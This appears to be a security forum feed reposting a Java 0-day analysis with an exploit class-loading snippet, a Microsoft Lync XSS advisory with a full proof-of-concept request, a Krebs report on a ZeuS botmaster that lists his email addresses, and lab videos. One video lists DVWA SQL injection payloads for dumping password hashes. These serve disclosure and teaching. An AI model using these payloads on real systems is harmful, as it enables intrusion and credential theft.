  11. This write up documents an analysis of the current Java zero-day floating around that affects version 7 update 10. Hello All, We were notified today of ongoing attacks with the use of a new Java vulnerability affecting latest version 7 Update 10 of the software [1][2]. Due to the unpatched status of Issue 50 [3] and some inquiries received regarding whether the attack code found exploited this bug, we had a quick look at the exploit code found in the wild. Below, we are providing you with the results of our analysis. The 0-day attack code that was spotted in the wild today is yet another instance of Java security vulnerabilities that stem from insecure implementation of Reflection API [4]. The new attack is a combination of two vulnerabilities. The first flaw allows to load arbitrary (restricted) classes by the means of findClass method of com.sun.jmx.mbeanserver.MBeanInstantiator class. This can be accomplished by the means of this code: public static Class loadClass(String name) throws Throwable { JmxMBeanServerBuilder jmxbsb=new JmxMBeanServerBuilder(); JmxMBeanServer jmxbs=(JmxMBeanServer)jmxbsb.newMBeanServer("",null,null); MBeanInstantiator mbi=jmxbs.getMBeanInstantiator(); return mbi.findClass(name,(ClassLoader)null); } The problem stems from insecure call to Class.forName() method. The second issue abuses the new Reflection API to successfully obtain and call MethodHandle objects that point to methods and constructors of restricted classes. This second issue relies on invokeWithArguments method call of java.lang.invoke.MethodHandle class, which has been already a subject of a security problem (Issue 32 that we reported to Oracle on Aug 31, 2012). The company had released a fix for Issue 32 in Oct 2012. However, it turns out that the fix was not complete as one can still abuse invokeWithArguments method to setup calls to invokeExact method with a trusted system class as a target method caller. This time the call is however done to methods of new Reflection API (from java.lang.invoke.* package), of which many rely on security checks conducted against the caller of the target method. Oracle's fix for Issue 32 relies on a binding of the MethodHandle object to the caller of a target method / constructor if it denotes a potentially dangerous Reflection API call. This binding has a form of injecting extra stack frame from a caller's Class Loader namespace into the call stack prior to issuing a security sensitive method call. Calls to blacklisted Reflection APIs are detected with the use of isCallerSensitive method of MethodHandleNatives class. The blacklisting however focuses primarily on Core Reflection API (Class.forName(), Class.getMethods(), etc.) and does not take into account the possibility to use new Reflection API calls. As a result, the invokeWithArguments trampoline used in the context of a system (privileged) lookup object may still be abused for gaining access to restricted classes, their methods, etc. The above is important in the context of a security check that is implemented by the Lookup class. Its checkSecurityManager method compares the Class Loader (CL) namespace of the caller class of a target find [*] method (findStatic, findVirtual, etc.) with the CL namespace of a class for which a given find operation is conducted. Access to restricted packages is not checked only if Class Loader namespaces are equal (the case for public lookup object, but also for a trusted method caller such as invokeWithArguments invoked for not blacklisted method). The exploit vector used by the attack code is the same as the one we used for second instance of our Proof of Concept code for Issue 32 (reported to Oracle on 17-Sep-2012). This exploit vector relies on sun.org.mozilla.javascript.internal.GeneratedClassLoader class in order to define a fully privileged attacker's class in a system Class Loader namespace. From that point all security checks can be easily disabled. This is not the first time Oracle fails to "sync" security of Core and new Reflection APIs. Just to mention the Reflection API filter. This is also not the first time Oracle's own investigation / analysis of security issues turns out to be not sufficiently comprehensive. Just to mention Issue 50, which was discovered in the code addressed by the company not so long ago... Bugs are like mushrooms, in many cases they can be found in a close proximity to those already spotted. It looks Oracle either stopped the picking too early or they are still deep in the woods... Thank you. Best Regards Adam Gowdiak --------------------------------------------- Security Explorations http://www.security-explorations.com "We bring security research to the new level" --------------------------------------------- References: [1] Malware don't need Coffee: 0 day 1.7u10 spotted in the Wild - Disable Java Plugin NOW ! http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html [2] New year, new Java zeroday! http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/ [3] [SE-2012-01] Critical security issue affecting Java SE 5/6/7 http://seclists.org/fulldisclosure/2012/Sep/170 [4] SE-2012-01 Details http://www.security-explorations.com/en/SE-2012-01-details.html Via: Java Zero-Day Analysis ? Packet Storm
  12. [h=2]Microsoft Lync 2012 Code Execution Vulnerability[/h] Summary ======= Microsoft Lync 2010 fails to properly sanitize user-supplied input, which can lead to remote code execution. Microsoft was originally notified of this issue December 11, 2012. The details of this issue were made public January 11, 2013. CVE number: Not Assigned Impact: Low Vendor homepage: http://lync.microsoft.com/ Vendor notified: December 11, 2012 Vendor fixed: N/A Credit: Christopher Emerson of White Oak Security (http://www.whiteoaksecurity.com/) Affected Products ================ Confirmed in Microsoft Lync Server 2010, version 4.0.7577.0. Other versions may also be affected. Details ======= Microsoft Lync 2010, version 4.0.7577.4087, fails to sanitize the “User-Agent Header” for meet.domainame.com. By inserting JavaScript into the aforementioned parameters and stacking commands, an attacker can execute arbitrary commands in the context of the application. Impact ====== Malicious users could execute arbitrary applications on the client systems, compromising the confidentiality, integrity and availability of information on the client system. Solution ======== The vendor should implement thorough input validation in order to remove dangerous characters from user supplied data. Additionally, the vendor should implement thorough output encoding in order to display, and not execute, dangerous characters within the browser. Proof-of-Concept (PoC) =================== The following Request is included as a proof of concept. The proof of concept is designed to open notepad.exe when the Request is received by the server. GET /christopher.emerson/JW926520 HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)";var oShell = new ActiveXObject("Shell.Application");var commandtoRun = "C:\\Windows\\notepad.exe";oShell.ShellExecute(commandtoRun,"","","open","1");-" Host: meet.domainname.com Connection: Keep-Alive Cookie: LOCO=yes; icscontext=cnet; ProfileNameCookie=Christopher Below is an abbreviated copy of the Response: HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-MS-Server-Fqdn: domainname.com X-Powered-By: ASP.NET Date: Mon, 07 May 2012 20:26:55 GMT Connection: keep-alive Content-Length: 23901 <!--NOTE: If DOCTYPE element is present, it causes the iFrame to be displayed in a small--> <!--portion of the browser window instead of occupying the full browser window.--> <html xmlns="http://www.w3.org/1999/xhtml" class="reachJoinHtml"> <head> <meta http-equiv="X-UA-Compatible" content="IE=10; IE=9; IE=8; requiresActiveX=true" /> <title>Microsoft Lync</title> <script type="text/javascript"> var reachURL = "https:// domainname.com/Reach/Client/WebPages/ReachJoin.aspx?xml=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48Y29uZi1pbmZvIHhtbG5zOnhzaT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEtaW5zdGFuY2UiIHhtbG5zOnhzZD0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3J0Yy8yMDA5LzA1L3NpbXBsZWpvaW5jb25mZG9jIj48Y29uZi11Y21rLXNpcDpjaHJpc3RvcGhlci5lbWVyc29uQGRvbWFpbm5hbWUuY29tO2dydXU7b3BhcXVlPWFwcDpjb25mOmZvY3VzOmlkOkpXOTI2NTIwPC9jb25mLXVyaT48c2VydmVyLXRpbWU+OTEuODAwNDwvc2VydmVyLXRpbWU+PG9yaWdpbmFsLWluY29taW5nLXVybD5odHRwczovL21lZXQuZG9tYWlubmFtZS5jb20vY2hyaXN0b3BoZXIuZW1lcnNvbi9KVzkyNjUyMDwvb3JpZ2luYWwtaW5jb21pbmctdWNtdy08Y29uZi1rZXk+Slc5MjY1MjA8L2NvbmYta2V5PjwvY29uZi1pbmZiejQh"; var escapedXML = "'\x3c\x3fxml version\x3d\x221.0\x22 encoding\x3d\x22utf-8\x22\x3f\x3e\x3cconf-info xmlns\x3axsi\x3d\x22http\x3a\x2f\x2fwww.w3.org\x2f2001\x2fXMLSchema-instance\x22 xmlns\x3axsd\x3d\x22http\x3a\x2f\x2fwww.w3.org\x2f2001\x2fXMLSchema\x22 xmlns\x3d\x22http\x3a\x2f\x2fschemas.microsoft.com\x2frtc\x2f2009\x2f05\x2fsimplejoinconfdoc\x22\x3e\x3cconf-uri\x3esip\x3achristopher.emerson\x40 domainname.com \x3bgruu\x3bopaque\x3dapp\x3aconf\x3afocus\x3aid\x3aJW926520\x3c\x2fconf-uri\x3e\x3cserver-time\x3e91.8004\x3c\x2fserver-time\x3e\x3coriginal-incoming-url\x3ehttps\x3a\x2f\ x2fmeet.domainname.com \x2fchristopher.emerson\x2fJW926520\x3c\x2foriginal-incoming-url\x3e\x3cconf-key\x3eJW926520\x3c\x2fconf-key\x3e\x3c\x2fconf-info\x3e'"; var showJoinUsingLegacyClientLink = "False"; var validMeeting = "True"; var reachClientRequested = "False"; var currentLanguage = "en-US"; var reachClientProductName = "Lync Web App"; var crackUrlRequest = "True"; var isNokia = "False"; var isAndroid = "False"; var isWinPhone = "False"; var isIPhone = "False"; var isIPad = "False"; var isMobile = "False"; var isUnsupported = "False"; var domainOwnerJoinLauncherUrl = ""; var lyncLaunchLink = "conf:sip:christopher.emerson@ domainname.com ;gruu;opaque=app:conf:focus:id:JW926520%3Frequired-media=audio"; var errorCode = "-1"; var diagInfo = "Machine:MachineNameBrowserId:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)";var oShell = new ActiveXObject("Shell.Application");var commandtoRun = "C:\\Windows\\notepad.exe";oShell.ShellExecute(commandtoRun,"","","open","1");-"Join attempted at:5/7/2012 3:26:55 PM"; var resourceUrl = "/meet/JavaScriptResourceHandler.ashx?lcs_se_w14_onprem4.0.7577.197&language="; Vendor Statement ============== The vulnerability described in this report is a XSS vulnerability in the User-Agent which requires an attacker to be in a man-in-the middle situation in order to be able to modify the User-Agent. In a default configuration of Lync server, TLS encryption is used to protect against this type of attack. Customers concerned about this issue should check their environments to ensure that Lync is configured to use TLS to encrypt all traffic, a default configuration. Disclosure Timeline ============== December 11, 2012: Disclosed to vendor (Microsoft Security Response Center). December 18, 2012: Vendor’s initial response. December 20, 2012: Vendor deemed issue a Low severity and confirmed issue would be fixed in next product release. December 27, 2012: Received vendor approval to disclose along with Vendor Statement (see above). January 11, 2013: Disclosed vulnerability publicly ( http://whiteoaksecurity.com/blog/2013/1/11/microsoft-lync-server-2010-remote-code-executionxss-user-agent-header ). ===================================================================== # 3C8F2163853A5DE5 1337day.com [2013-01-13] 1A58B10CEE71628B # Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
  13. Era doar o ironie domnule fan Tinkode. Ca sa iti petreci 5 minute pentru a gasi un SQL Injection intr-un site trebuie sa alegi site-ul nu? Tu ai ales "Asociatia Asistentilor Medicali din Banat". Eu doar te-am intrebat: "DE CE?". Trebuie sa ai un motiv nu? Sau a fost doar un dork si acesti "nenorociti" au cazut in primele rezultate Google? Intrebarea mea e simpla: "Care este motivul pentru care ai ales acest site?".
  14. Uau, ce "tinte"... Cum le gasesti?
  15. Sau invata C/C++ si o sa poti programa si pentru frigider sau cuptorul cu microunde...
  16. Java e cross-platform, adica poti face o aplicatie care sa ruleze si pe Windows si pe Linux. Problema principala este ca pentru a putea rula e nevoie de JRE (Java Runtime). Ca sa poti face aplicatii in Java trebuie sa cunosti clasele pe care le ofera. O alta problema cu Java este ca incepe sa nu mai fie foarte apreciat deoarece au aparut foarte multe exploit-uri. Visual Basic e strict marca Microsoft, si cred ca te referi la VB.NET deoarece nu cred ca e cazul sa se ramana la VB6. Daca vrei sa programezi strict pentru Windows, atunci poti folosi VB.NET insa iti recomand mai degraba C#. .NET Framework este un framework extrem de puternic si care iti ofera multe avantaje pentru scrierea rapida a unei aplicatii, insa ca si JRE este o dependinta necesara pentru a putea rula aplicatiile ce il folosesc.
  17. Nu inteleg de ce se face atata scandal pe seama asta, trebuie sa fii cap de tanc sa dai click pe asta: Apoi sa dai Run: Ca apoi sa existe posibilitatea sa nu functioneze: Singurul browser care nu te avertizeaza ca vei executa cod Java e Opera (cel putin versiunea pe care o am eu) insa fereastra cu "Run", pe langa avertismentele oferite de celalalte browsere care cer permisiunea utilizatorului, apare intotdeauna.
  18. Police Arrest Alleged ZeuS Botmaster “bx1? A man arrested in Thailand this week on charges of stealing millions from online bank accounts fits the profile of a miscreant nicknamed “bx1,” a hacker fingered by Microsoft as a major operator of botnets powered by the ZeuS banking trojan. As reported by The Bangkok Post, 24-year-old Hamza Bendelladj, an Algerian national, was detained this weekend at Bangkok’s Suvarnnabhumi airport, as he was in transit from Malaysia to Egypt. This young man captured news media attention when he was brought out in front of Thai television cameras handcuffed but smiling broadly, despite being blamed by the FBI for hacking into customer accounts at 217 financial institutions worldwide. Thai investigators told reporters that Bendelladj had amassed “huge amounts” in illicit earnings, and that “with just one transaction he could earn 10 to 20 million dollars. He’s been travelling the world flying first class and living a life of luxury.” I didn’t fully appreciate why I found this case so interesting until I started searching the Internet and my own servers for his email address. Turns out that in 2011, I was contacted via instant message by a hacker who said he was operating botnets using the Zeus and SpyEye Trojans. This individual reached out to me repeatedly over the next year, for no apparent reason except to brag about his exploits. He contacted me via Microsoft’s MSN instant message platform, using the email address daniel.h.b@universityofsutton.com. That account used the alias “Daniel.” I later found out that Daniel also used the nickname bx1. According to several forums on which bx1 hung out until very recently, the man arrested in Thailand and bx1 were one and the same. A review of the email addresses and other contact information bx1 shared on these forums suggests that bx1 was the 19th and 20th John Doe named in Microsoft’s 2012 legal suit seeking to discover the identities of 39 alleged ZeuS botmasters. From the complaint Microsoft submitted to the U.S. District Court for the Eastern District of Virginia, and posted at Zeuslegalnotice.com: “Plaintiffs are informed and believe and thereupon allege that John Doe 19/20 goes by the aliases “Daniel,” “bx1,” “Daniel Hamza” and “Danielbx1” and may be contacted at messaging email and messaging addresses “565359703,” airlord1988@gmail.com, bx1@hotmail.com, i_amhere@hotmail.fr, daniel.h.b@universityof sutton.com, princedelune@hotmail.fr, bx1_@msn.com, danibx1@hotmail.fr, and danieldelcore@hotmail.com. Upon information and belief, John Doe 19/20 has purchased and used the Zeus/SpyEye code.” The Daniel I chatted with was proud of his work, and seemed to enjoy describing successful attacks. In one such conversation, dated January 2012, bx1 bragged about breaking into the systems of a hacker who used the nickname “Symlink” and was renowned in the underground for writing complex, custom Web injects for ZeuS and SpyEye users. Specifically, Symlink’s code was designed to automate money transfers out of victim banks to accounts that ZeuS and SpyEye botmasters controlled. Here’s an excerpt from that chat: (12:31:22 AM) Daniel: if you wanna write up a story (12:31:34 AM) Daniel: a very perfect (12:31:34 AM) Daniel: even Interpol will get to you (12:31:35 AM) Brian Krebs: ? (12:31:42 AM) Daniel: i hacked the guy who fucked most banks (12:31:48 AM) Daniel: symlink the guy who made ATS (12:31:49 AM) Daniel: [img=https://rstforums.com/secimg.php?url=http://krebsonsecurity.com/wp-includes/images/smilies/icon_smile.gif] (12:32:02 AM) Daniel: ATS = Auto Transfer System (12:32:15 AM) Daniel: and get his Backups + Pictures and all his details (12:32:37 AM) Daniel: Recent Job etc etc (12:33:06 AM) Brian Krebs: what’s his name? (12:33:17 AM) Daniel: full name ? (12:34:03 AM) Brian Krebs: yeah (12:34:10 AM) Daniel: hmmmm (12:34:50 AM) Daniel: besliu vasile (12:35:01 AM) Brian Krebs: what kind of name is that? (12:35:11 AM) Brian Krebs: romanian? (12:35:13 AM) Daniel: Moldovian name (12:35:53 AM) Daniel: he is ugly motherufcka. (12:36:18 AM) Daniel: after i hacked him he said that i destroyed his life ( (12:36:27 AM) Brian Krebs: aww (12:36:55 AM) Daniel: yea because i spoke to him (12:37:10 AM) Daniel: i said how much u pay for ur info to stay private (12:37:19 AM) Daniel: then he said he destroyed his [hard drive] (12:37:28 AM) Daniel: i said i dont care i got Backup (12:37:32 AM) Daniel: it tooks me months to download all (12:37:48 AM) Daniel: his Previous job..ats..proof video (12:37:55 AM) Daniel: his picture with Zeus botnet showing up money (12:38:12 AM) Daniel: his car Plate number (12:38:17 AM) Daniel: Girls Friends (12:38:23 AM) Daniel: his workshop. he is mechanic (12:40:49 AM) Brian Krebs: huh. how come it took you months to [download]? (12:41:43 AM) Daniel: i waiting for him (12:41:46 AM) Daniel: if he don’t [pay] then i share just his personel info (12:41:57 AM) Daniel: and videos that proof abt his jobs etc etc It’s not clear whether bx1 had anything to do with it, but according to a lengthy thread on Mazafaka, one of the Underweb’s most exclusive cybercrime forums, Symlink was arrested late last year in Moldova. In a post on Oct. 11, 2012, forum regulars said Symlink had been arrested the day before, and that he got caught because he flaunted his ill-gotten wealth with fancy cars (a fully loaded Land Cruiser 200, valued at more than $100,000) and ostentatious lifestyle choices that were apparently considered far beyond the means of a local auto mechanic. As they do anytime a forum member gets arrested, the forum administrators banned Symlink’s account to distance themselves from the former member. “Economic police came to symlink yesterday. All computers were seized, one was encrypted and two not, all jabbers at the moment of seizure were online. Ban him temporarily, but better permanently. He was received adultly [meaning, arrested seriously]. Idiot overplayed.” It’s safe to say that bx1 had his share of enemies, and its possible that Symlink and/or his buddies got the last laugh. According to information obtained by KrebsOnSecurity, attackers recently targeted bx1 in a successful hack to break into his computer, making off with many files, email messages, screenshots and images from his machine. Among them were scanned copies of two identity cards, both bearing the name and likeness of Hamza “Daniel” Bendelladj; one from a “University of Sutton,” and another that appears to be some kind of international ID card. It’s not clear whether these documents are legitimate or manufactured, but probably the latter: the domain attached to bx1?s MSN email address — universityofsutton.com — is registered with the following contact data: domain: universityofsutton.com owner: Daniel Delcore organization: VIRUS & Malware Scanner email: bx1_@msn.com address: 522 8th street city: Columbus state: IN postal-code: 47201 country: US phone: +1.7573011758 admin-c: CCOM-1611324 bx1_@msn.com tech-c: CCOM-1611324 bx1_@msn.com billing-c: CCOM-1611324 bx1_@msn.com Sursa: Police Arrest Alleged ZeuS Botmaster “bx1? — Krebs on Security
  19. Monitoring Strcpy With Bphook In The Immunity Debugger Description: This is the solution to an exercise I had given in the SPSE course. I wanted the students to write a BPHook in the Immunity Debugger to monitor the arguments of the strcpy function. Due to the sparse documentation of the Immunity Debugger, this came out to be quite a challenge for many students. Why is this useful? API monitoring is probably the most fundamental thing when you want to observe programs at runtime and understand what they are doing. This video provides you the details on how to to the Immunity Debugger to write such as hook. SPSE Course details and sample videos: SecurityTube Python Scripting Expert
  20. Nosql, No Security? Description: Serving as a scalable alternative to traditional relational databases (RDBs), NoSQL databases have exploded in popularity. NoSQL databases offer more efficient ways to work with large datasets, but serious security issues need to be addressed. NoSQL databases can suffer from a variety of injection attacks. Most NoSQL databases can’t authenticate and authorize clients, and can’t provide role-based access controls or encryption. Because these controls do not exist, developers and administrators are forced to implement their own controls to compensate for these shortcomings. These compensating controls could become a problem for organizations that have compliance considerations and could make maintaining NoSQL more complex than simply deploying an enterprise relational database that features built-in security. Because many NoSQL architectures lack encryption and authentication, an attacker could eavesdrop on the client-server communication and obtain private data. Additionally, NoSQL databases can suffer from a variety of injection attacks via Javascript and JSON. Traditional SQL injection countermeasures are not effective against these attacks, so developers must be aware of these threats and write code that attackers can’t penetrate. In this presentation we’ll talk about how RDB security features and threats apply to NoSQL databases. We’ll also explore the security controls that are present in NoSQL architectures, and cover administrative, compliance and regulatory concerns associated with operating NoSQL architectures in environments that contain sensitive data. ***** Speaker: Will Urbanski, Dell Secureworks Will Urbanski, vulnerability engineer, Dell SecureWorks, guides large enterprises in initiating and administering vulnerability management programs within their corporate environments. Will also conducts penetration and vulnerability validation tests. An information security professional with more than seven years of industry experience, Will has been published in numerous journals, including IEEE Security & Privacy, and has co-authored a patent for an IPv6 moving target defense. Previously, Will worked in research and in security operations roles at Virginia Polytechnic Institute and the University of Georgia. He holds a B.S. in Computer Science from the University of Georgia, and is certified as a PCI Approved Scanning Vendor, a GIAC Penetration Tester and a GIAC Web Application Penetration Tester. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: NoSQL, No Security? - Will Urbanski on Vimeo Sursa: Nosql, No Security?
  21. Dns - Spoof + Browser Exploitation Description: In this video I will show you how to use Ettercap and Browser Exploitation module for Exploitation a local machine without giving any kind of URL. I’m using Ettercap for DNS spoofing and Metasploit for Browser Exploitation. In your network lets see the victim is using Google, Yahoo, Gmail, or any website. What you have to use - Ettercap you need to replace the path and if he will access google or yahoo if victim running vulnerable browser so you will get the shell or if not then he is not able to browser that particular sites. Very easy to follow but it is good technique I think. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Dns - Spoof + Browser Exploitation
  22. Dvwa - Blind Sql Injection Description: In this video I will show you how to use SQL Injection queries for exploitation a database for usersname and hash. I’m using DVWA with low level security. Use Metasploitable – 2 for DVWA. SQL Injection queries : - 1' and 1=1# 1' and 1=1 order by 2 # 'or' 1=1— 1' and 1=0 union select null,table_name from information_schema.tables# 1' and 1=0 union select null,table_name from information_schema.columns where table_name='users' # 1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users' # 1' and 1=0 union select null,concat(first_name,0x0a,password) from users # 1 and 1=0 union select table_name, column_name from information_schema.columns where table_name=0x7573657273 Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Dvwa - Blind Sql Injection
  23. Devine popular: Java Applet JMX Remote Code Execution Malware Intelligence Lab from FireEye - Research & Analysis of Zero-Day & Advanced Targeted Threats:Happy New Year from New Java Zero-Day Java allows 'open hunting season' for hackers, experts find | ZDNet Mozilla touts 'Click to Play' in defense against Java vulnerability | ZDNet
  24. [h=1]Web Warriors ~ CBC Documentary[/h] http://www.youtube.com/watch?feature=player_detailpage&v=34cwMz3HZ8Q Enter the world of hackers and cyber sleuths. The internet is touted as one of the most important inventions in the history of modern man, and like the discovery of the atom, its ability to benefit mankind is matched only by its potential to unleash massive destruction. Web Warriors is a one-hour documentary that offers an unprecedented glimpse into the world's newest and most vulnerable frontier: cyberspace. We enter the world of hackers like Mafia Boy - a 15 year old high school student who rose to infamy in 2000 by causing millions of dollars in damage after single-handedly shutting down internet giants - including Yahoo, Amazon, eBay, Dell, eTrade, and CNN. We'll meet hackers like Donnie who goes on a journey into the Russian cyber underground as he searches for the creators of a computer virus with the hopes of collecting the $250,000 bounty being offered by Microsoft. Just as in nature, computer viruses have rapidly evolved and now have the ability to control millions of computers unbeknownst to their owners, thereby creating massive illegal computer networks known as "Botnets". These "Botnets" are being put to a variety of illicit uses including identity theft and cyber extortion, but they are also the latest and most potent weapon being deployed in military conflicts. Web Warriors dissects the massive cyber attack against Estonia in 2007 which virtually shut down the country and resulted in NATO deploying its cyber response team. Web Warriors offers rare interviews with cyber sleuths from the FBI, the Pentagon, NATO, and the Department of Homeland Security who explain how cyberspace has become the latest battle ground between nation states and how terrorist groups are already plotting their next move. Web Warriors offers a fast-paced never-seen before glimpse into the cyber trenches of a world wide battle. Some reports say the cost of cyber crime is now on par with the illegal drug trade. Web Warriors was produced by Edward Peill for Tell Tale Productions Inc.
×
×
  • Create New...